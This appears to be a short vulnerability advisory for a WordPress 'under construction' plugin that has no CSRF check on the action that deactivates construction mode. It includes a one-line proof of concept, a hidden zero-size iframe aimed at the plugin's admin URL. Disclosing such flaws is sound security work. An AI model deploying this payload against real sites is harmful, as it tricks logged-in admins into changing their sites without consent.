The plugin does not have CSRF check in place when deactivating the construction mode, which could allow attackers to make a logged in admin perform such action via a CSRF attack
<iframe src="http://example.com/wp-admin/index.php?page=under-construction&turnOffUnderConstructionMode" width="0" height="0" frameborder="0"></iframe>
Daniel Ruf
Daniel Ruf
Yes
2022-05-26 (about 2 months ago)
2022-05-26 (about 2 months ago)
2022-05-26 (about 2 months ago)